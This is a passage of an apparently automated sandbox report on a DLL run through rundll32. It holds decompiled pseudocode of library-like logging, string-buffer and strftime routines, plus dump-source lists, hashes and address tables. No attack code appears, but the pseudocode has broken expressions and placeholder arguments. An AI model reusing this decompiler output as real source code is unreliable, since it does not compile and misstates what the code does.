                                                                      														asm("sbb eax, ebp");
                                                                      														if(0 < _t132[6] || _t91 != 0) {
                                                                      															L100A0678();
                                                                      															 *0x80000000 = 0x22;
                                                                      															_t64 = 0;
                                                                      														} else {
                                                                      															_t64 =  ~(_t132[6]);
                                                                      															asm("adc edx, 0x0");
                                                                      														}
                                                                      														goto L31;
                                                                      													} else {
                                                                      														_t64 = _t132[6];
                                                                      														if(_t132[7] < 0 || _t91 != 0) {
                                                                      															L100A0678();
                                                                      															 *_t64 = 0x22;
                                                                      															return 0xffffffff;
                                                                      														} else {
                                                                      															L31:
                                                                      															return _t64;
                                                                      														}
                                                                      													}
                                                                      													goto L51;
                                                                      													L17:
                                                                      													_t90 = _t97;
                                                                      													goto L18;
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						goto L29;
                                                                      					}
                                                                      				}
                                                                      				L51:
                                                                      			}


























                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: isupper$_errnoislowerisspace
                                                                      • String ID: $
                                                                      • API String ID: 4095548146-3993045852
                                                                      • Opcode ID: 86157aabf5dcf11647465d89481f5db1467bac492865d6203d8e1a1173ce975d
                                                                      • Instruction ID: bf1127f437a700fe79d2786272533d695bbcf864f17e232e7603132a75f37682
                                                                      • Opcode Fuzzy Hash: 86157aabf5dcf11647465d89481f5db1467bac492865d6203d8e1a1173ce975d
                                                                      • Instruction Fuzzy Hash: A171A0746087868FC300CF68C88065EFBE2EFC9394F15492DF8998B791E674D845AB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 40%
                                                                      			E10026169(void* __edi, signed char* __ebp, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, unsigned int _a36, signed char* _a40, signed char* _a44, char _a48, signed char* _a1072, signed char* _a2096, signed char* _a3120, signed char* _a4144, intOrPtr _a4148, intOrPtr _a4152, signed int _a5204, char* _a5208, char* _a5212) {
                                                                      				signed int _t63;
                                                                      				signed int _t67;
                                                                      				signed int _t70;
                                                                      				signed int _t73;
                                                                      				signed int _t76;
                                                                      				signed int _t81;
                                                                      				void* _t84;
                                                                      				signed char* _t85;
                                                                      				int _t87;
                                                                      				signed char* _t88;
                                                                      				intOrPtr _t92;
                                                                      				signed char* _t93;
                                                                      				char* _t102;
                                                                      				signed char* _t103;
                                                                      				signed char* _t104;
                                                                      				signed char* _t105;
                                                                      				signed char* _t106;
                                                                      				char* _t107;
                                                                      				char* _t122;
                                                                      				signed int _t123;
                                                                      				char* _t125;
                                                                      				signed char* _t130;
                                                                      				signed char** _t132;
                                                                      
                                                                      				_t130 = __ebp;
                                                                      				if(( *0x100d76ac & 0x00000002) != 0) {
                                                                      					_t51 = _a5204 + 8; // 0x101
                                                                      					__edx = _t51;
                                                                      					__eax = 0x100b6d3b;
                                                                      					if(__edx <= 0x40) {
                                                                      						__eax =  *((intOrPtr*)(0x100b6f40 + __edx * 4));
                                                                      					}
                                                                      					_a8 = __eax;
                                                                      					__eax = "[%s] ";
                                                                      					_a4 = "[%s] ";
                                                                      					 *__esp = __edi;
                                                                      					__eax = L100089C0();
                                                                      				}
                                                                      				 *_t132 = _t130;
                                                                      				_a8 = _a5212;
                                                                      				_a4 = _a5208;
                                                                      				L10008B70();
                                                                      				_t107 = _a1072;
                                                                      				_t102 = _a2096;
                                                                      				_t122 = _a3120;
                                                                      				_t125 = _a4144;
                                                                      				if( *_t107 != 0 ||  *_t102 != 0 ||  *_t122 != 0 ||  *_t125 != 0) {
                                                                      					_t92 = _a4148;
                                                                      					_t63 = 0;
                                                                      					if(_t92 != 0 && _a4152 >= _t92) {
                                                                      						_t63 = (0 | ( *(_t125 + _t92 - 1) & 0x000000ff) == 0x0000000a |  *(_t125 + _t92 - 1) & 0 | ( *(_t125 + _t92 - 1) & 0x000000ff) == 0x0000000d) & 0x000000ff;
                                                                      					}
                                                                      					 *0x100ad00c = _t63;
                                                                      				}
                                                                      				_a24 = _t125;
                                                                      				_t93 =  &_a48;
                                                                      				_a8 = "%s%s%s%s";
                                                                      				_a20 = _t122;
                                                                      				_a16 = _t102;
                                                                      				_a12 = _t107;
                                                                      				_a4 = 0x400;
                                                                      				 *_t132 = _t93;
                                                                      				L10025AE0();
                                                                      				_t67 =  *0x100d76a0;
                                                                      				if(_t67 == 0) {
                                                                      					 *_t132 = 2;
                                                                      					L100A0860();
                                                                      					asm("sbb eax, eax");
                                                                      					 *0x100d76a0 = _t67 | 0x00000001;
                                                                      				}
                                                                      				_t123 =  *0x100ad00c; // 0x1
                                                                      				_t126 =  *0x100d7280;
                                                                      				if(_t123 == 0 || ( *0x100d76ac & 0x00000001) == 0) {
                                                                      					L12:
                                                                      					if(_t126 > 0) {
                                                                      						 *_t132 = 2;
                                                                      						_t123 = 0;
                                                                      						_t85 =  *0x100ad0cc();
                                                                      						_a8 = _t126;
                                                                      						_t126 = "    Last message repeated %d times\n";
                                                                      						_a4 = "    Last message repeated %d times\n";
                                                                      						 *_t132 = _t85;
                                                                      						E10025610();
                                                                      						 *0x100d7280 = 0;
                                                                      					}
                                                                      					_a4 = _t93;
                                                                      					 *_t132 = 0x100d72a0;
                                                                      					strcpy(??, ??);
                                                                      					_t103 = _a1072;
                                                                      					_t70 =  *_t103 & 0x000000ff;
                                                                      					if(_t70 == 0) {
                                                                      						L20:
                                                                      						E100257B0(_a40, _t93, _t103, 0, _t123, _t126);
                                                                      						_t104 = _a2096;
                                                                      						_t73 =  *_t104 & 0x000000ff;
                                                                      						if(_t73 == 0) {
                                                                      							L26:
                                                                      							E100257B0(_a44, _t93, _t104, 0, _t123, _t126);
                                                                      							_t105 = _a3120;
                                                                      							_t76 =  *_t105 & 0x000000ff;
                                                                      							if(_t76 == 0) {
                                                                      								L32:
                                                                      								_t128 = _a36 >> 8;
                                                                      								_t96 =  >  ? 7 : _a5204 >> 3;
                                                                      								_t97 =  <  ? 0 :  >  ? 7 : _a5204 >> 3;
                                                                      								E100257B0( <  ? 0 :  >  ? 7 : _a5204 >> 3,  <  ? 0 :  >  ? 7 : _a5204 >> 3, _t105, _a36 >> 8, _t123, _a36 >> 8);
                                                                      								_t106 = _a4144;
                                                                      								_t81 =  *_t106 & 0x000000ff;
                                                                      								if(_t81 == 0) {
                                                                      									L38:
                                                                      									E100257B0(_t97, _t97, _t106, _t128, _t123, _t128);
                                                                      									goto L39;
                                                                      								}
                                                                      								L34:
                                                                      								while(_t81 - 0xe > 0x11 && _t81 > 7) {
                                                                      									_t81 = _t106[1] & 0x000000ff;
                                                                      									_t106 =  &(_t106[1]);
                                                                      									if(_t81 != 0) {
                                                                      										continue;
                                                                      									}
                                                                      									L37:
                                                                      									_t106 = _a4144;
                                                                      									goto L38;
                                                                      								}
                                                                      								 *_t106 = 0x3f;
                                                                      								_t106 =  &(_t106[1]);
                                                                      								_t81 =  *_t106 & 0x000000ff;
                                                                      								if(_t81 != 0) {
                                                                      									goto L34;
                                                                      								}
                                                                      								goto L37;
                                                                      							}
                                                                      							L28:
                                                                      							while(_t76 - 0xe > 0x11 && _t76 > 7) {
                                                                      								_t76 = _t105[1] & 0x000000ff;
                                                                      								_t105 =  &(_t105[1]);
                                                                      								if(_t76 != 0) {
                                                                      									continue;
                                                                      								}
                                                                      								L31:
                                                                      								_t105 = _a3120;
                                                                      								goto L32;
                                                                      							}
                                                                      							 *_t105 = 0x3f;
                                                                      							_t105 =  &(_t105[1]);
                                                                      							_t76 =  *_t105 & 0x000000ff;
                                                                      							if(_t76 != 0) {
                                                                      								goto L28;
                                                                      							}
                                                                      							goto L31;
                                                                      						}
                                                                      						L22:
                                                                      						while(_t73 - 0xe > 0x11 && _t73 > 7) {
                                                                      							_t73 = _t104[1] & 0x000000ff;
                                                                      							_t104 =  &(_t104[1]);
                                                                      							if(_t73 != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							L25:
                                                                      							_t104 = _a2096;
                                                                      							goto L26;
                                                                      						}
                                                                      						 *_t104 = 0x3f;
                                                                      						_t104 =  &(_t104[1]);
                                                                      						_t73 =  *_t104 & 0x000000ff;
                                                                      						if(_t73 != 0) {
                                                                      							goto L22;
                                                                      						}
                                                                      						goto L25;
                                                                      					} else {
                                                                      						L16:
                                                                      						while(_t70 - 0xe > 0x11 && _t70 > 7) {
                                                                      							_t70 = _t103[1] & 0x000000ff;
                                                                      							_t103 =  &(_t103[1]);
                                                                      							if(_t70 != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							L19:
                                                                      							_t103 = _a1072;
                                                                      							goto L20;
                                                                      						}
                                                                      						 *_t103 = 0x3f;
                                                                      						_t103 =  &(_t103[1]);
                                                                      						_t70 =  *_t103 & 0x000000ff;
                                                                      						if(_t70 != 0) {
                                                                      							goto L16;
                                                                      						}
                                                                      						goto L19;
                                                                      					}
                                                                      				} else {
                                                                      					 *_t132 = _t93;
                                                                      					_t106 = 0x100d72a0;
                                                                      					_a4 = 0x100d72a0;
                                                                      					_t87 = strcmp(??, ??);
                                                                      					if(_t87 != 0) {
                                                                      						goto L12;
                                                                      					}
                                                                      					if(_a48 != 0) {
                                                                      						 *_t132 = _t93;
                                                                      						L100A07D8();
                                                                      						if( *((char*)(_t132 + _t87 + 0x2f)) == 0xd) {
                                                                      							goto L12;
                                                                      						}
                                                                      						_t128 =  &(_t126[1]);
                                                                      						 *0x100d7280 = _t128;
                                                                      						if( *0x100d76a0 == 1) {
                                                                      							 *_t132 = 2;
                                                                      							_t88 =  *0x100ad0cc();
                                                                      							_a8 = _t128;
                                                                      							_a4 = "    Last message repeated %d times\r";
                                                                      							 *_t132 = _t88;
                                                                      							E10025610();
                                                                      						}
                                                                      						L39:
                                                                      						 *_t132 = _t130;
                                                                      						_a4 = 0;
                                                                      						_t84 = E10009690(0, _t106, _t123, _t128);
                                                                      						 *_t132 = 0x100d76b0;
                                                                      						L100A0978();
                                                                      						return _t84;
                                                                      					}
                                                                      					goto L12;
                                                                      				}
                                                                      			}



























                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ExclusiveLockReleasemv_bprint_finalizemv_bprintfmv_vbprintfstrcmpstrcpy
                                                                      • String ID: Last message repeated %d times$%s%s%s%s$[%s]
                                                                      • API String ID: 4275616186-1378087399
                                                                      • Opcode ID: 92fe572d3c91f27e652c46d7d51aebd23f6a1e44d33db3be991a07085aa6e5fb
                                                                      • Instruction ID: d1eb8843b360d500b767063b44c9564666ae391a763e2864b4dfe10f501dd800
                                                                      • Opcode Fuzzy Hash: 92fe572d3c91f27e652c46d7d51aebd23f6a1e44d33db3be991a07085aa6e5fb
                                                                      • Instruction Fuzzy Hash: B661C0749093C18FD720CF24D8807AABBE2FF85344F85885EE8CA57342D736A945DB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 36%
                                                                      			E10009130() {
                                                                      				int _t86;
                                                                      				void* _t91;
                                                                      				void* _t93;
                                                                      				signed char _t99;
                                                                      				void* _t111;
                                                                      				signed char _t113;
                                                                      				void* _t114;
                                                                      				void* _t118;
                                                                      				signed char _t119;
                                                                      				void* _t121;
                                                                      				int _t122;
                                                                      				void* _t123;
                                                                      				unsigned int _t124;
                                                                      				unsigned int _t125;
                                                                      				signed int _t126;
                                                                      				void* _t130;
                                                                      				void* _t131;
                                                                      				int _t132;
                                                                      				void* _t136;
                                                                      				signed char _t139;
                                                                      				signed char _t141;
                                                                      				void* _t142;
                                                                      				void* _t143;
                                                                      				signed int _t144;
                                                                      				int _t145;
                                                                      				void* _t147;
                                                                      				signed int _t148;
                                                                      				signed int _t151;
                                                                      				int _t153;
                                                                      				signed int _t154;
                                                                      				void _t158;
                                                                      				void* _t159;
                                                                      				char* _t161;
                                                                      				void** _t162;
                                                                      				void* _t165;
                                                                      				void* _t166;
                                                                      				void** _t167;
                                                                      				void*** _t168;
                                                                      
                                                                      				_t86 = _t168[0x111];
                                                                      				_t167 = _t168[0x110];
                                                                      				if( *_t86 == 0) {
                                                                      					L40:
                                                                      					return _t86;
                                                                      				} else {
                                                                      					_t118 = _t167[2];
                                                                      					while(1) {
                                                                      						_t145 = _t167[1];
                                                                      						_t88 =  <=  ? _t145 : _t118;
                                                                      						_t121 = _t118 - ( <=  ? _t145 : _t118);
                                                                      						if(_t121 != 0) {
                                                                      							goto L15;
                                                                      						}
                                                                      						 *_t168 = _t168[0x111];
                                                                      						_t9 = strlen(??) + 1; // 0x1
                                                                      						_t159 = _t9;
                                                                      						L11:
                                                                      						_t124 = _t167[3];
                                                                      						if(_t124 == _t118 || _t145 >= _t118) {
                                                                      							L22:
                                                                      							_t95 =  <=  ? _t118 : _t145;
                                                                      							_t119 = _t118 - ( <=  ? _t118 : _t145);
                                                                      							if(_t119 > 0x3ff) {
                                                                      								L26:
                                                                      								_t139 = _t119;
                                                                      								_t147 =  *_t167 + _t145;
                                                                      								if(_t119 >= 8) {
                                                                      									if((_t147 & 0x00000001) != 0) {
                                                                      										 *_t147 = 0x21;
                                                                      										_t139 = _t119 - 1;
                                                                      										_t147 = _t147 + 1;
                                                                      									}
                                                                      									if((_t147 & 0x00000002) != 0) {
                                                                      										 *_t147 = 0x2121;
                                                                      										_t139 = _t139 - 2;
                                                                      										_t147 = _t147 + 2;
                                                                      									}
                                                                      									if((_t147 & 0x00000004) != 0) {
                                                                      										 *_t147 = 0x21212121;
                                                                      										_t139 = _t139 - 4;
                                                                      										_t147 = _t147 + 4;
                                                                      									}
                                                                      									_t125 = _t139;
                                                                      									_t139 = _t139 & 0x00000003;
                                                                      									_t126 = _t125 >> 2;
                                                                      									memset(_t147, 0x21212121, _t126 << 2);
                                                                      									_t168 =  &(_t168[3]);
                                                                      									_t147 = _t147 + _t126;
                                                                      									if((_t139 & 0x00000004) == 0) {
                                                                      										goto L29;
                                                                      									} else {
                                                                      										goto L28;
                                                                      									}
                                                                      									goto L40;
                                                                      								} else {
                                                                      									if((_t139 & 0x00000004) != 0) {
                                                                      										L28:
                                                                      										 *_t147 = 0x21212121;
                                                                      										_t147 = _t147 + 4;
                                                                      									}
                                                                      								}
                                                                      								L29:
                                                                      								if((_t139 & 0x00000002) != 0) {
                                                                      									 *_t147 = 0x2121;
                                                                      									_t147 = _t147 + 2;
                                                                      								}
                                                                      								if((_t139 & 0x00000001) != 0) {
                                                                      									 *_t147 = 0x21;
                                                                      								}
                                                                      								_t161 = "[truncated strftime output]";
                                                                      								_t99 =  <=  ? _t119 : 0x1b;
                                                                      								_t141 =  *_t167 + _t167[1];
                                                                      								if(0x1b >= 4) {
                                                                      									if((_t141 & 0x00000001) != 0) {
                                                                      										_t141 = _t141 + 1;
                                                                      										_t161 = "truncated strftime output]";
                                                                      										_t99 = _t99 - 1;
                                                                      										 *((char*)(_t141 - 1)) = "[truncated strftime output]" & 0x000000ff;
                                                                      									}
                                                                      									if((_t141 & 0x00000002) != 0) {
                                                                      										_t148 =  *_t161 & 0x0000ffff;
                                                                      										_t141 = _t141 + 2;
                                                                      										_t161 =  &(_t161[2]);
                                                                      										_t99 = _t99 - 2;
                                                                      										 *(_t141 - 2) = _t148;
                                                                      									}
                                                                      									if(_t99 >= 4) {
                                                                      										_t168[7] = _t99;
                                                                      										_t131 = 0;
                                                                      										_t151 = _t99 & 0xfffffffc;
                                                                      										do {
                                                                      											 *(_t141 + _t131) = _t161[_t131];
                                                                      											_t131 = _t131 + 4;
                                                                      										} while (_t131 < _t151);
                                                                      										_t99 = _t168[7];
                                                                      										_t141 = _t141 + _t131;
                                                                      										_t161 =  &(_t161[_t131]);
                                                                      									}
                                                                      								}
                                                                      								_t130 = 0;
                                                                      								if((_t99 & 0x00000002) != 0) {
                                                                      									_t130 = 2;
                                                                      									 *_t141 =  *_t161 & 0x0000ffff;
                                                                      								}
                                                                      								if((_t99 & 0x00000001) != 0) {
                                                                      									 *((char*)(_t141 + _t130)) = _t161[_t130] & 0x000000ff;
                                                                      								}
                                                                      								_t142 = _t167[1];
                                                                      								_t102 =  >  ? _t119 : 0xfffffffa - _t142;
                                                                      								_t86 = ( >  ? _t119 : 0xfffffffa - _t142) + _t142;
                                                                      								_t136 = _t167[2];
                                                                      								_t167[1] = 0xfffffffa;
                                                                      								if(_t136 != 0) {
                                                                      									L39:
                                                                      									_t138 =  >  ? _t86 : _t136 - 1;
                                                                      									_t93 =  *_t167;
                                                                      									 *((char*)(_t93 + ( >  ? _t86 : _t136 - 1))) = 0;
                                                                      									return _t93;
                                                                      								}
                                                                      								goto L40;
                                                                      							} else {
                                                                      								_t162 =  &(_t168[8]);
                                                                      								 *_t168 = _t162;
                                                                      								_t168[3] = _t168[0x112];
                                                                      								_t168[2] = _t168[0x111];
                                                                      								_t86 = 0x400;
                                                                      								_t168[1] = 0x400;
                                                                      								L100A07D0();
                                                                      								if(0x400 != 0) {
                                                                      									_t168[2] = _t162;
                                                                      									_t168[1] = 0x100af500;
                                                                      									 *_t168 = _t167;
                                                                      									return L100089C0();
                                                                      								} else {
                                                                      									if(_t119 != 0) {
                                                                      										_t145 = _t167[1];
                                                                      										goto L26;
                                                                      									}
                                                                      									goto L40;
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t110 =  >  ? _t159 : 0xfffffffe - _t145;
                                                                      							_t111 = _t145 + ( >  ? _t159 : 0xfffffffe - _t145) + 1;
                                                                      							if(_t124 >> 1 >= _t118) {
                                                                      								_t118 = _t118 + _t118;
                                                                      							} else {
                                                                      								_t118 = _t124;
                                                                      							}
                                                                      							if(_t118 < _t111) {
                                                                      								_t115 =  <=  ? _t124 : _t111;
                                                                      								_t118 =  <=  ? _t124 : _t111;
                                                                      							}
                                                                      							_t165 =  *_t167;
                                                                      							_t168[1] = _t118;
                                                                      							if(_t165 ==  &(_t167[4])) {
                                                                      								 *_t168 = 0;
                                                                      								_t113 = L10028DA0();
                                                                      								if(_t113 == 0) {
                                                                      									goto L21;
                                                                      								} else {
                                                                      									goto L19;
                                                                      								}
                                                                      							} else {
                                                                      								 *_t168 = _t165;
                                                                      								_t113 = L10028DA0();
                                                                      								if(_t113 == 0) {
                                                                      									L21:
                                                                      									_t118 = _t167[2];
                                                                      									_t145 = _t167[1];
                                                                      									goto L22;
                                                                      								} else {
                                                                      									if(_t165 == 0) {
                                                                      										L19:
                                                                      										_t153 = _t167[1];
                                                                      										_t143 = _t113;
                                                                      										_t166 =  *_t167;
                                                                      										_t132 = _t153 + 1;
                                                                      										_t168[7] = _t166;
                                                                      										if(_t132 >= 8) {
                                                                      											if((_t113 & 0x00000001) != 0) {
                                                                      												_t144 =  *_t166 & 0x000000ff;
                                                                      												_t132 = _t153;
                                                                      												_t166 = _t166 + 1;
                                                                      												 *_t113 = _t144;
                                                                      												_t82 = _t113 + 1; // 0x1
                                                                      												_t143 = _t82;
                                                                      											}
                                                                      											if((_t143 & 0x00000002) != 0) {
                                                                      												_t154 =  *_t166 & 0x0000ffff;
                                                                      												_t143 = _t143 + 2;
                                                                      												_t166 = _t166 + 2;
                                                                      												_t132 = _t132 - 2;
                                                                      												 *(_t143 - 2) = _t154;
                                                                      											}
                                                                      											if((_t143 & 0x00000004) != 0) {
                                                                      												_t158 =  *_t166;
                                                                      												_t143 = _t143 + 4;
                                                                      												_t166 = _t166 + 4;
                                                                      												_t132 = _t132 - 4;
                                                                      												 *(_t143 - 4) = _t158;
                                                                      											}
                                                                      										}
                                                                      										_t114 = memcpy(_t143, _t166, _t132);
                                                                      										_t168 =  &(_t168[3]);
                                                                      									}
                                                                      									 *_t167 = _t114;
                                                                      									_t167[2] = _t118;
                                                                      									continue;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						goto L66;
                                                                      						L15:
                                                                      						_t168[1] = _t121;
                                                                      						_t168[7] = _t121;
                                                                      						_t168[3] = _t168[0x112];
                                                                      						_t168[2] = _t168[0x111];
                                                                      						_t91 =  *_t167;
                                                                      						 *_t168 = _t91 + _t145;
                                                                      						L100A07D0();
                                                                      						if(_t91 != 0) {
                                                                      							_t122 = _t167[1];
                                                                      							_t92 =  <=  ? 0xfffffffa - _t122 : _t91;
                                                                      							_t136 = _t167[2];
                                                                      							_t86 = ( <=  ? 0xfffffffa - _t122 : _t91) + _t122;
                                                                      							_t167[1] = _t86;
                                                                      							if(_t136 != 0) {
                                                                      								goto L39;
                                                                      							}
                                                                      							goto L40;
                                                                      						} else {
                                                                      							_t123 = _t168[7];
                                                                      							_t159 = 0x7fffffff;
                                                                      							_t145 = _t167[1];
                                                                      							_t118 = _t167[2];
                                                                      							if(_t123 <= 0x3fffffff) {
                                                                      								_t159 = _t123 + _t123;
                                                                      							}
                                                                      							goto L11;
                                                                      						}
                                                                      						goto L66;
                                                                      					}
                                                                      				}
                                                                      				L66:
                                                                      			}

                                                                      0x1000916d
                                                                      0x10009173
                                                                      0x10009179
                                                                      0x10009250
                                                                      0x10009257
                                                                      0x1000925e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000917f
                                                                      0x1000917f
                                                                      0x10009182
                                                                      0x10009189
                                                                      0x10009281
                                                                      0x10009281
                                                                      0x10009284
                                                                      0x00000000
                                                                      0x1000918f
                                                                      0x10009191
                                                                      0x10009260
                                                                      0x10009260
                                                                      0x10009263
                                                                      0x10009265
                                                                      0x10009268
                                                                      0x1000926b
                                                                      0x10009272
                                                                      0x10009382
                                                                      0x10009495
                                                                      0x10009498
                                                                      0x1000949a
                                                                      0x1000949b
                                                                      0x1000949d
                                                                      0x1000949d
                                                                      0x1000949d
                                                                      0x1000938b
                                                                      0x10009480
                                                                      0x10009483
                                                                      0x10009486
                                                                      0x10009489
                                                                      0x1000948c
                                                                      0x1000948c
                                                                      0x10009394
                                                                      0x1000939a
                                                                      0x1000939c
                                                                      0x1000939f
                                                                      0x100093a2
                                                                      0x100093a5
                                                                      0x100093a5
                                                                      0x10009394
                                                                      0x1000927a
                                                                      0x1000927a
                                                                      0x1000927a
                                                                      0x10009197
                                                                      0x1000919a
                                                                      0x00000000
                                                                      0x1000919a
                                                                      0x10009189
                                                                      0x10009179
                                                                      0x00000000
                                                                      0x100091f8
                                                                      0x100091f8
                                                                      0x10009203
                                                                      0x10009207
                                                                      0x10009212
                                                                      0x10009216
                                                                      0x1000921b
                                                                      0x1000921e
                                                                      0x10009225
                                                                      0x10009438
                                                                      0x10009444
                                                                      0x10009447
                                                                      0x1000944a
                                                                      0x1000944c
                                                                      0x10009451
                                                                      0x00000000
                                                                      0x10009457
                                                                      0x00000000
                                                                      0x1000922b
                                                                      0x1000922b
                                                                      0x1000922f
                                                                      0x10009234
                                                                      0x10009237
                                                                      0x10009240
                                                                      0x10009246
                                                                      0x10009246
                                                                      0x00000000
                                                                      0x10009240
                                                                      0x00000000
                                                                      0x10009225
                                                                      0x1000919d
                                                                      0x00000000

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_reallocstrftimestrlen
                                                                      • String ID: !!!!$[truncated strftime output]
                                                                      • API String ID: 709960874-1743851734
                                                                      • Opcode ID: d5bbf64755c465b92655ce73a4e1a41950866e2796eda1fbafdbb6a7e4c7dd5d
                                                                      • Instruction ID: 6237faa146818e252d6bc5810784fdb2c70fb651bac13d65fe422c41695cf2e5
                                                                      • Opcode Fuzzy Hash: d5bbf64755c465b92655ce73a4e1a41950866e2796eda1fbafdbb6a7e4c7dd5d
                                                                      • Instruction Fuzzy Hash: 40A19071A042429FE715CF28C98539E77E2EF843D0F268528ED898B399E735DE45CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: isupper$_errnoislowerisspace
                                                                      • String ID: $
                                                                      • API String ID: 4095548146-3993045852
                                                                      • Opcode ID: be9900f16ef8ba6dd7badc9de842b1b9b2026b697452fe85c3562d42e694471b
                                                                      • Instruction ID: e6fe0532defbc5c939969159b76f19bdcb6dcf227e53754754f51ab417db1434
                                                                      • Opcode Fuzzy Hash: be9900f16ef8ba6dd7badc9de842b1b9b2026b697452fe85c3562d42e694471b
                                                                      • Instruction Fuzzy Hash: 91619074A0C3858BC704CF68C48021EFBE6EFC9354F154A2DF8D99B391D674D945AB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: mv_bprint_init_for_buffermv_bprintf
                                                                      • String ID: ambisonic ACN %d$none$user %d
                                                                      • API String ID: 2490314137-4180635230
                                                                      • Opcode ID: b66278b44bd33978a7099e039c8c5aff353fdb60d4a10324e67c31c1774a271f
                                                                      • Instruction ID: b6a1bd800e9813b9dae9be9b31ba14f11150b02b1f0a339f321a001e9bfab4f6
                                                                      • Opcode Fuzzy Hash: b66278b44bd33978a7099e039c8c5aff353fdb60d4a10324e67c31c1774a271f
                                                                      • Instruction Fuzzy Hash: B71172B4909B558BE320DF24C48096EB7E0FF847C4F51881EF5D887289D334A981DB93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: mv_bprint_init_for_buffermv_bprintf
                                                                      • String ID: AMBI%d$NONE$USR%d
                                                                      • API String ID: 2490314137-3656852315
                                                                      • Opcode ID: 43d24e6ab82ebdc785fe14ad5c403714f51aa5fcf9dbfb0c2afa0a7af5774545
                                                                      • Instruction ID: 0a946672120a056d3661d42bdbf04e5838db89b9617306f254fc419f9ddf239a
                                                                      • Opcode Fuzzy Hash: 43d24e6ab82ebdc785fe14ad5c403714f51aa5fcf9dbfb0c2afa0a7af5774545
                                                                      • Instruction Fuzzy Hash: 41117FB4919745CBE314EF28C480A5EB7E0FF84380F51C92EF68897254C334AA419B93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: mv_callocmv_fifo_alloc2mv_fifo_freep2mv_freepmv_malloczmv_sample_fmt_is_planarmv_samples_get_buffer_size
                                                                      • String ID:
                                                                      • API String ID: 3721653357-0
                                                                      • Opcode ID: 6a25a427b3a7cd424786be72b2dc5f3278f13d1d67c199b93a466af71cd06fba
                                                                      • Instruction ID: e2c14ad1b6a78883c2eba2dd48e6cbb770f894d0147dffab9e861290766f1c48
                                                                      • Opcode Fuzzy Hash: 6a25a427b3a7cd424786be72b2dc5f3278f13d1d67c199b93a466af71cd06fba
